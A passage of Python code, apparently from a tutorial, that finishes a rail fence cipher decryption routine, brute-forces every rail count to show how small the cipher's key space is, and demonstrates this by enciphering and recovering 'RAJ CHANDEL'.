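        rows.append(list(ciphertext[pos:pos + n]))
        pos += n
    return "".join(rows[r].pop(0) for r in pattern)


def brute_force_rails(ciphertext, max_rails=10):
    """The Limitation above: the key space is so small that every rail count
    can be tried; the reader looks for the candidate that reads as a name."""
    return {r: rail_fence_decrypt(ciphertext, r) for r in range(2, max_rails + 1)}


if __name__ == "__main__":
    rows, ct = rail_fence_encrypt("RAJ CHANDEL", 3)
    for i, row in enumerate(rows, 1):
        print(f"Row {i}: {row}")           # RHE / ACADL / JN
    print(ct)                              # RHEACADLJN
    print(brute_force_rails(ct)[3])        # RAJCHANDEL
```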